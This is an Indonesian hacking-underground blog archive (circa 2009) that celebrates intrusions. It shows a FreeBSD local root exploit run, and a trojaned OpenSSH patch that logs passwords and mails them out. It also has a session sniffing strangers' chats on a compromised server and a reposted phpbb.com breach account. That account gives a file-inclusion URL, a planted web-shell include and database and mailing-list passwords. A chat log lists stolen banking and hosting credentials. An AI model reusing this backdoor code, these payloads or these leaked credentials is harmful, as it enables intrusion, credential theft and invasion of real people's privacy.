Archive for the ‘Underground’ Category
FreeBSD rtld 0day exploit
King Cope publish local exploit ini ke FD-Lists.
[bofh@begok ~/hack]$ uname -a FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009 root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK i386 [bofh@begok ~/hack]$ ./fbsd-local-2009.sh fbsd-local-2009.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' 8:35 /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)
Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p.
** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test. *sigh*.
ZFO #5 Released
Menjelang Security Conference BlackHat 2009 di Las Vegas, ZFO memberi sambutan yang cukup hangat dengan me-release Ezine mereka yang ke-5. Salah satu mirror-nya bisa di lihat disini. Seperti-nya gerakan para Undergrounders seperti 5-6 tahun yang lalu bakal mulai terulang. Seruu…. 
Bye bye milw0rm?!
Mungkin para fans berat milw0rm sudah banyak yang mengetahui bahwa milw0rm dinyatakan akan ditutup, dan beberapa saat terakhir sudah tidak bisa diakses lagi. Alasannya mungkin bisa dilihat dari berita ini, walaupun beberapa rumor banyak yang beredar bahwa ada alasan lain dibalik semua ini yang menharuskan str0ke menutup milw0rm. Namun dari twitter-nya str0ke sepertinya akan ada angin baik mengenai milw0rm, we’ll see.
Mungkin sudah saatnya mencari alternatif lain?!packetstormsecurity masih tetap memberikan archive exploits, tools, serta POC tiap bulannya, atau mungkin sudah saatnya situs ini mendapatkan lebih banyak hits terutama bagi mereka yang merindukan suasana milw0rm?! 
PHRACK #66
Sudah di rilis dan bisa dinikmati melalui situs resminya. Huff, tonight would be fun longgg night .
.astalavista has been pawned by anti-sec group.
.pr0j3kt m4yh3m aris again,
.sec-industry industri kembali di permalukan, kali ini giliran astalavista,
.read here for gr34t35t tr1p.
.nb:ternyata baik exploit ataupun scripts yang di publish oleh astalavista sebagian berasal dari ripping
milw0rm dan bila diperhatikan md5 hash yg dipaparkan, plaint text berisi nama like amar0184,pascal,kio42m
ataupun yang membuat kami tersenyum penggunaan adminadmin, astalavista, dan juga 123456 sebagai password.
.what the m**s with u astalavista council-
.update: nowayout /at/ astalavista staff, 3xp053d.
Tcpdump for kIdz
Apakah tcpdump?
tcpdump adlah slh satu program linux,yg berfungsi untuk menangkap aliran paket
data dari eth0 eth1,yg lebih umum dikenal dengan Nm Sniffing
Ok sedikit berbagi pengalamn
tepatny kemarin ketika sy check email trnyata sdh ada bbrp log yg masuk
dri hasil Backdorinf port 22 OpenSSH 4.7p1 yg sy infect ke sbuah
server hasil rooting,ttg bgaiman cr backdooring itu sdh dijelaskn sblumnya oleh
para Dedengkot2 disini..hehehe
//logs di file
+ if((f=fopen(LOGZ,"a"))!=NULL){
+ fprintf(f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
+ //kirim ke server pake curl/mail terserah
+ //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s \"[owned user]new fucked user\" [cencored]@live.com",LOGZ);
+ system(logz);
...
anda dpt membaca dr script di atas,styap ada yg
melakukan koneksi ssh dr server itu kluar maupun stu localhost
otomatis terkirim ke email sya
ok lgkah awal
sy login ke server hasil sniffed tsb,
lsg aja
root@ds6471:/# cat etc/hosts 127.0.0.1 localhost server0 xx.xxx.xx.xxx rahasia.deh.id #client customer 192.168.90.4 client1 192.168.90.10 client2 192.168.90.15 client3 192.168.90.51 client4 192.168.90.22 client5 192.168.90.201 client6 Woow..keknya server warnet nih..ato kantor ,g tau dah..^^ trs ak liat trafikny,trnyata g bsa iftop,mrka pakai Nload hmm.. root@ds6471:/# uname -a;cat etc/issue Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux Ubuntu 6.06 LTS \n \l pakai ubuntu..:D,g pake lm lsg aj root@ds6471:/#apt-get install iftop okee sdh terinstall root@ds6471:/#iftop -i eth1 -F 192.168.90.10/32 12.5Kb 25.0Kb 37.5Kb 50.0Kb 62.5Kb +------------------------------------------------------------------------------- 192.168.90.10 <=> bs2.ads.vip.tpc.yahoo.com 5.25Kb 4.03Kb 2.99Kb 192.168.90.10 <=> tx-in-f113.google.com 3.66Kb 4.02Kb 4.22Kb 192.168.90.10 <=> ns3.turbodns.co.uk 748b 1.29Kb 983b 192.168.90.10 <=> 194.14.236.50 1.22Kb 250b 267b 192.168.90.10 <=> server6614.dedicated.webf 0b 188b 67b 192.168.90.10 <=> ds6488.dedicated.turbodns 0b 188b 67b 192.168.90.10 <=> raucousdns.co.uk 0b 188b 67b 192.168.90.10 <=> ad1.vip.rm.jp1.yahoo.net 0b 188b 67b 192.168.90.10 <=> server6485.dedicated.webf 0b 188b 67b 192.168.90.10 <=> in2.msg.vip.mud.yahoo.com 94kb 188b 67b 192.168.90.10 <=> server6542.dedicated.webf 0b 141b 50b 192.168.90.10 <=> server6437.dedicated.webf 0b 125b 132b 192.168.90.10 <=> 239.255.2.2 0b 36b 13b 192.168.90.10 <=> server6577.dedicated.webf 0b 0b 67b 192.168.90.10 <=> server6636.dedicated.webf 90kb 0b 67b 192.168.90.10 <=> server6542.dedicated.webf 0b 0b 67b 192.168.90.10 <=> server6643.dedicated.webf 0b 0b 65b -------------------------------------------------------------------------------- TX: cumm: 64.4KB peak: 3.08Kb rates: 10.8Kb 1.72Kb 1.32Kb RX: 57.4KB 3.08Kb 12.6Kb 1.81Kb 904b TOTAL: 122KB 5.42Kb 114Kb 3.54Kb 2.21Kb Ok ada bnyk trafik ke disni ak akn coba sniff perckpan yahoo massnger. root@ds6471:/#tcpdump -n -f -s 0 -X -vvv -i eth1 port 5050 and host 192.168.90.10 >>log.txt tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes root@ds6471:~# ls -lia total 80 1196084 drwxr-xr-x 7 root root 4096 Apr 16 10:47 . 1179916 drwxr-xr-x 19 root root 32768 Apr 15 07:47 .. 1459192 drwx------ 2 root root 4096 Feb 7 05:30 .aptitude 1202658 -rw------- 1 root root 4480 Apr 16 10:47 .bash_history 1198732 -rw-r--r-- 1 root root 2227 Oct 13 2005 .bashrc 1441948 drwxr-xr-x 5 root root 4096 Jan 7 15:05 .cpan 1427211 drwxr-xr-x 3 root root 4096 Apr 15 20:00 .mc 1461933 drwxr-xr-x 4 root root 4096 Apr 16 02:28 .msf3 1198731 -rw-r--r-- 1 root root 141 Oct 13 2005 .profile 1427701 drwx------ 2 root root 4096 Apr 15 01:04 .ssh 1197166 -rw-r--r-- 1 root root 5642 Apr 16 10:47 log.txt root@ds6471:~#vi log.txt 04:38:19.084903 IP (tos 0x0, ttl 48, id 19232, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.12.mmcc > 192.168.90.10.spice: ., cksum 0xebfd (correct), 1186:1186(0) ack 1906 win 65535 0x0000: 4500 0028 4b20 4000 3006 d7ce 44b4 d90c E..(K.@.0...D... 0x0010: 0a00 0021 13ba 0783 cadb 4578 4b27 253d ...!......ExK'%= 0x0020: 5010 ffff ebfd 0000 P....... 04:38:19.088461 IP (tos 0x0, ttl 50, id 48894, offset 0, flags [DF], proto: TCP (6), length: 197) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: P, cksum 0x2ad7 (correct), 251:408(157) ack 697 win 65535 0x0000: 4500 00c5 befe 4000 3206 6159 44b4 d906 E.....@.2.aYD... 0x0010: 0a00 0021 13ba 044f 9c67 1abb 16f7 4f35 ...!...O.g....O5 0x0020: 5018 ffff 2ad7 0000 594d 5347 0010 0000 P...*...YMSG.... 0x0030: 0089 0006 0000 0001 005a 514e 34c0 8064 .........ZQN4..d 0x0040: 696b 7375 6b6d 61c0 8030 c080 6469 6b73 iksukma..0..diks 0x0050: 756b 6d61 c080 31c0 8064 696b 7375 6b6d ukma..1..indra_ram 0x0060: 61c0 8035 c080 6e61 7277 6173 7475 5f65 a..5....... 0x0070: 6b61 c080 3134 c080 4c68 6120 4d6f 6d20 ka..14..Lha.Mom. 0x0080: 6a67 206e 7461 7220 6c6f 7720 6472 6f70 jg.ntar.low.drop 0x0090: 2e2e 6269 6b69 6e20 7174 6132 2067 726f ..bikin.qta2.gro 0x00a0: 6279 616b 616e 2064 6527 c080 3633 c080 byakan.de'..63.. 0x00b0: 3b30 c080 3634 c080 30c0 8031 3030 3933 ;0..64..0..10093 0x00c0: c080 34c0 80 ..4.. 04:38:19.281253 IP (tos 0x0, ttl 127, id 58814, offset 0, flags [DF], proto: TCP (6), length: 40) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: ., cksum 0x566e (correct), 697:697(0) ack 408 win 64405 0x0000: 4500 0028 e5be 4000 7f06 ee35 0a00 0021 E..(..@....5...! 0x0010: 44b4 d906 044f 13ba 16f7 4f35 9c67 1b58 D....O....O5.g.X 0x0020: 5010 fb95 566e 0000 0000 0000 0000 P...Vn........ 04:38:27.311007 IP (tos 0x0, ttl 127, id 59642, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405 0x0000: 4500 0074 e8fa 4000 7f06 eaad 0a00 0021 E..t..@........! 0x0010: 44b4 d906 044f 13ba 16f7 4f35 9c67 1b58 D....O....O5.g.X 0x0020: 5018 fb95 a725 0000 594d 5347 0010 0000 P....%..YMSG.... 0x0030: 0038 004b 0000 0016 005a 514e 3439 c080 .8.K.....ZQN49.. 0x0040: 5459 5049 4e47 c080 31c0 806e 6172 7761 TYPING..1..nnina 0x0050: 7374 755f 656b 61c0 8031 34c0 8020 c080 _dewi..14..... 0x0060: 3133 c080 31c0 8035 c080 6469 6b73 756b 13..1..5..indra_ra 0x0070: 6d61 c080 ma.. 04:38:27.656225 IP (tos 0x0, ttl 50, id 25872, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535 0x0000: 4500 0028 6510 4000 3206 bbe4 44b4 d906 E..(e.@.2...D... 0x0010: 0a00 0021 13ba 044f 9c67 1b58 16f7 4f81 ...!...O.g.X..O. 0x0020: 5010 ffff 51b8 0000 P...Q... 04:38:27.935586 IP (tos 0x0, ttl 127, id 59670, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405 0x0000: 4500 0074 e916 4000 7f06 ea91 0a00 0021 E..t..@........! 0x0010: 44b4 d906 044f 13ba 16f7 4f35 9c67 1b58 D....O....O5.g.X 0x0020: 5018 fb95 a725 0000 594d 5347 0010 0000 P....%..YMSG.... 0x0030: 0038 004b 0000 0016 005a 514e 3439 c080 .8.K.....ZQN49.. 0x0040: 5459 5049 4e47 c080 31c0 806e 6172 7761 TYPING..1.. 0x0050: 7374 755f 656b 61c0 8031 34c0 8020 c080 ..14..... 0x0060: 3133 c080 31c0 8035 c080 6469 6b73 756b 13..1..5..indra_ra 0x0070: 6d61 c080 ma.. 04:38:28.145719 IP (tos 0x0, ttl 50, id 32447, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535 0x0000: 4500 0028 7ebf 4000 3206 a235 44b4 d906 E..(~.@.2..5D... 0x0010: 0a00 0021 13ba 044f 9c67 1b58 16f7 4f81 ...!...O.g.X..O. 0x0020: 5010 ffff 51b8 0000 P...Q... 04:38:30.059920 IP (tos 0x0, ttl 127, id 59763, offset 0, flags [DF], proto: TCP (6), length: 77) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x9d0a (correct), 773:810(37) ack 408 win 64405 0x0000: 4500 004d e973 4000 7f06 ea5b 0a00 0021 E..M.s@....[...! 0x0010: 44b4 d906 044f 13ba 16f7 4f81 9c67 1b58 D....O....O..g.X 0x0020: 5018 fb95 9d0a 0000 594d 5347 0010 0000 P.......YMSG.... 0x0030: 0011 008a 0000 0000 005a 514e 30c0 806e .........ZQN0..n 0x0040: 6172 7761 7374 755f 656b 61c0 80 nina_dewi.. 04:38:30.371870 IP (tos 0x0, ttl 50, id 60817, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5193 (correct), 408:408(0) ack 810 win 65535 0x0000: 4500 0028 ed91 4000 3206 3363 44b4 d906 E..(..@.2.3cD... 0x0010: 0a00 0021 13ba 044f 9c67 1b58 16f7 4fa6 ...!...O.g.X..O. 0x0020: 5010 ffff 5193 0000 P...Q... 04:38:38.347798 IP (tos 0x0, ttl 127, id 59995, offset 0, flags [DF], proto: TCP (6), length: 146) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x0704 (correct), 810:916(106) ack 408 win 64405 0x0000: 4500 0092 ea5b 4000 7f06 e92e 0a00 0021 E....[@........! 0x0010: 44b4 d906 044f 13ba 16f7 4fa6 9c67 1b58 D....O....O..g.X 0x0020: 5018 fb95 0704 0000 594d 5347 0010 0000 P.......YMSG.... 0x0030: 0056 0006 5a55 aa56 005a 514e 31c0 806e .V..ZU.V.ZQN1..n 0x0040: 6172 7761 7374 755f 656b 61c0 8035 c080 nina_dewi..5.. 0x0050: 6469 6b73 756b 6d61 c080 3937 c080 31c0 indra_rama..97..1. 0x0060: 8036 33c0 803b 30c0 8036 34c0 8030 c080 .63..;0..64..0.. 0x0070: 3230 36c0 8031 c080 3134 c080 6472 7064 206..1..14..drpd 0x0080: 2041 2720 7967 2064 726f 7020 6861 796f .A'.yg.drop.hayo 0x0090: c080 .. 04:38:38.663087 IP (tos 0x0, ttl 50, id 36364, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5129 (correct), 408:408(0) ack 916 win 65535 0x0000: 4500 0028 8e0c 4000 3206 92e8 44b4 d906 E..(..@.2...D... 0x0010: 0a00 0021 13ba 044f 9c67 1b58 16f7 5010 ...!...O.g.X..P. 0x0020: 5010 ffff 5129 0000 P...Q).. 04:38:38.675807 IP (tos 0x0, ttl 127, id 60002, offset 0, flags [DF], proto: TCP (6), length: 192) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xf909 (correct), 916:1068(152) ack 408 win 64405 0x0000: 4500 00c0 ea62 4000 7f06 e8f9 0a00 0021 E....b@........! 0x0010: 44b4 d906 044f 13ba 16f7 5010 9c67 1b58 D....O....P..g.X 0x0020: 5018 fb95 f909 0000 594d 5347 0010 0000 P.......YMSG.... 0x0030: 0038 004b 0000 0016 005a 514e 3439 c080 .8.K.....ZQN49.. 0x0040: 5459 5049 4e47 c080 31c0 806e 6172 7761 TYPING..1.. 0x0050: 7374 755f 656b 61c0 8031 34c0 8020 c080 dewi_eka..14..... 0x0060: 3133 c080 30c0 8035 c080 6469 6b73 756b 13..0..5..indra_ra 0x0070: 6d61 c080 594d 5347 0010 0000 0038 004b ma..YMSG.....8.K 0x0080: 0000 0016 005a 514e 3439 c080 5459 5049 .....ZQN49..TYPI 0x0090: 4e47 c080 31c0 806e 6172 7761 7374 755f NG..1..anak_ 0x00a0: 656b 61c0 8031 34c0 8020 c080 3133 c080 ilang..14.....13.. 0x00b0: 30c0 8035 c080 6469 6b73 756b 6d61 c080 0..5..indra_rama.. 04:38:38.987713 IP (tos 0x0, ttl 50, id 40636, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5091 (correct), 408:408(0) ack 1068 win 65535 0x0000: 4500 0028 9ebc 4000 3206 8238 44b4 d906 E..(..@.2..8D... 0x0010: 0a00 0021 13ba 044f 9c67 1b58 16f7 50a8 ...!...O.g.X..P. 0x0020: 5010 ffff 5091 0000 P...P...
yap kita telah me log percakapan mreka..
nah sekarang bagimana untuk sniff password,data2 ptg
bnyak berbagai cr…
selanjutnya anda dapet mengembangkn sendiri..
untk seperti pop3 ,smtp,dll..
Cheers,
Xsniffer
DDOS pada situs Metasploit dan Milw0rm
Sampai saat tulisan ini dibuat, metasploit dan milw0rm tidak bisa diakses. HDM memindahkan akses menuju metasploit ke port 8000, jadi bagi yang ingin akses metasploit untuk sementara bisa melalui link ini. Sedangkan milw0rm masih tetap down.
$ curl http://www.metasploit.com
ERROR: The requested URL could not be retrieved
ERROR
The requested URL could not be retrieved
While trying to retrieve the URL:
www.metasploit.com/
The following error was encountered:
- Request Timeout
The system returned:
A Timeout occurred while waiting to read data from the network. The network or server may be down or congested. Please retry your request.
$ curl http://www.milw0rm.com
curl: (6) Couldn't resolve host 'www.milw0rm.com'
Sementara itu HDM meng-klaim telah mengetahui pihak yang melakukan ddos dan redirect A record untuk metasploit.com ke forum pemilik botnet tersebut. Walaupun dia memberikan statement di irc bahwa koneksi sudah jauh berkurang dari 90 ribu per detik menjadi 500 per detik berkat countermeasure-nya namun saat tulisan ini dibuat situs metasploit masih belum dapat diakses.
DDOS tetap mainan yang sangat berbahaya hingga saat ini, dan aksi koleksi botnet (walaupun dengan gabungan beberapa metode) masih tetap masuk pilihan utama untuk melancarkan serangan DDOS.
PHPBB[dot]com was hacked
Bisa langsung dilihat pada blog ini.
Berhubung sudah banyak informasi (ie. pastebin) yang di delete dengan cepat, maka informasi blog tersebut di-copy kesini sebagai archive siapa tahu suatu saat dihapus. Teknik yang digunakan cukup menarik, terutama karena dilancarkan terhadap situs yang produknya digunakan oleh ribuan orang diseluruh dunia.
Taken from: http://hackedphpbb.blogspot.com
It all started on Jan 14th when I was surfing milw0rm and came across this exploit: http://www.milw0rm.com/exploits/7778 I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script’s location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite program proxy program and tried http://www.phpbb.com/lists/admin/index.php?_SERVER%5bConfigFile%5d=../../../../../../etc/passwd and sure enough it included the etc/passwd
http://hackedphpbb.pastebin.com/f70f8bcaf
http://rapidshare.com/files/192159914/etc.txt
So I moved on to /etc/httpd/conf/httpd.conf
http://rapidshare.com/files/192163061/httpd.txt
http://hackedphpbb.pastebin.com/d29d8d4c7
And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/ well it has been known for some time that you can include code in the error log. So I wanted to run some code, well in PHPBB3 the avatars are located in a folder called /home/virtual/phpbb.com/community/images/avatars/upload and your avatar is called (secret hash)_userid.jpg. But I didn’t know what the secret has was to include my picture (that had my own code in it) so by using the error log I injected code
And figured out that their hash is f51ee61fe7a83fdf72780912bced0855. So now every time I want to upload run code against the server I can include this: /../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text so cat /home/virtual/phpbb.com/community/config.php and sure enough, its in plain text.
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';
While I was at it I checked out the config for PHPlist and it was also in plain text:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';
So I started running commands and found out that I can upload a php text file on the forums and by finding where the path it was stored I was able to get around their 14kb restrictions on avatars and a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table it showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow I am shocked no one brute forced this. So I login and see what I can come across, wow 400,000 registered emails, I’m sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: http://rapidshare.com/files/192305758/out.txt
On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their user’s passwords in unsalted md5 and their admin’s passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do an mysql update to one of the admin account’s and your in. Or if you change their password to yours you can use the recover password function. More to come from this later.
So I wrote a script that submits via curl, the md5 hash to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the user name’s aren’t right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.
http://rapidshare.com/files/192304153/phpbb_users.sql
In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.
List passwords:
TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have
captcha-commits@lists.phpbb.com 54a946c47dd434b2
catdb-commits@lists.phpbb.com 6f543db8f086e11f
convertors-commits@lists.phpbb.com c192b68baacc8842
documentation-commits@lists.phpbb.com f85ffcdf9262420c
easymod-commits@lists.phpbb.com 5db5bf75be85191b
kbase-commits@lists.phpbb.com 7c843188ed2f6021
modteam-commits@lists.phpbb.com 533aeefe56bfa30c
prosilver-commits@lists.phpbb.com 859785a9cc724e03
website-commits@lists.phpbb.com 3c79b9864ae5ce43
phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4
st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa
iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8
packagemanager-commits@lists.phpbb.com 81657892dddafdca
moddocs-commits@lists.phpbb.com 85c837b7f78e5435
Told you they were random Meik 
edit by dhn: added website-commits
edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.
8kg;rt7Xykjq
That password should work for all mailing lists on code.phpbb.com.
Emergency contacts and irc info:
http://hackedphpbb.pastebin.com/f1399b3e8
And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:
http://rapidshare.com/files/192261517/backup_sql.gz
Next I enabled php in template files and added this bit of code to one of the templates:
$ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}
Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.
After searching around using the shell I came across the Blog settings:
define('DB_NAME', 'wordpress'); // The name of the database
define('DB_USER', 'blog'); // Your MySQL username
define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches. (even though the patch wasn’t released for 2 weeks). Also don’t allow admin’s to recover their passwords, they should have to contact another admin. Another item, doesn’t keep plain text files of passwords or in the database plain text passwords.
I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.
-----------------------------------UPDATE
to all that say i am a script kiddie, fuck you
phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
--------------------------update
here are some updated links
http://www.2shared.com/file/4785295/67200bd7/phpbb.html
when i was talking about encrypted passwords, i ment when it was stored in PHPlist in plain text
MS08-067 a.l.a SkidisH
In one night…
[Ctank]: men...MS08-067 masih tetap sedap buat skidish action yak...
[h3b]: masa' sih?! daerah sini udh pada patch 
...
[Ctank]: tergantung pemilihan networknya donk, VPN, dialup, hotspot, hotel, etc
[h3b]: ...
[Ctank]: My Document. mayan lah...
===
no speedy : 161301201302
password : SFD8NLexxx
ID Internet banking : sonniehoxxxx
Password : 888888
Billing Contact:
CV. AGUNG JAYA GEMILANG
steven xxxxxx ()
jln.nyi ageng xxxxxx 106. xxxx xxxxx
cirebon
Jawa Barat,45155
ID
Tel. +062.0231xxxxxx
Host : http://hostbang.com:2082 (cPanel)
u : nokiss
p : 214xxxxx
Host : indowebiz.com/iix/administrator (Web Panel)
u : masdapit
p : logxxxxxx
Host : indowebiz.com/client/admin (WHMCS)
u : indowebiz
p : xxxxx13
===
[h3b]: lucky bast*rd...
[Ctank]: LOL
Technology’s Top Unsolved Cybercrimes
-
The WANK Worm (October 1989), Possibly the first “hacktivist” attack. the WANK (Worm Against Nuclear Killer) hit NASA offices in Greenbelt, Maryland, by running a banner across system computers as part of a protect to stop the launch of the plutonium-fueled, Jupiter-bound Galileo probe.
-
U.K. Ministry of Defense Satelite Hack (February 1999), A small group of hackers traced to southern England gained controol of MoD Skynet military satelite and signaled a security intrusion characterized by officials as “information warfare”, in which an enemy attack by disrupting military communications. In the end, the hackers managed to reprogram the control system before being discovered.
-
CD Universe Credit Card Breach (January 2000), A blackmail scheme gone wrong, the posting of more than 300,000 credit card numbers by hacker maxim on a Web site entitled “The Maxus Credit Card Pipeline” has remained unsolved since early 2000. Maxim stole the credit card information by by breaching CDUniverse.com; he or she then demanded $100.000 from the Web site exchange for destroying the data. While Maxim is believed to be from Eastern Europe, the case remains unsolved !.
-
Military Source Code Stolen (December 2000), If there’s one thing you don’t want in the wrong hands, it’s the source code that can controol missile-guidance systems. In winterr 2000, a hacker broke into government-contracted Exigent Software Technology and nabbed two thirds of the codde for Exigent’s OS/COMET software, which is responsible for both missile and satelite guidance , from the Naval Research Lab in Washington D.C. Officials followed the trail of the intruder, “Leaf”, to the University of Kaiserslautern in Germany, but that’s wheere the trail appears to end.
Anyone can solve it ? ;P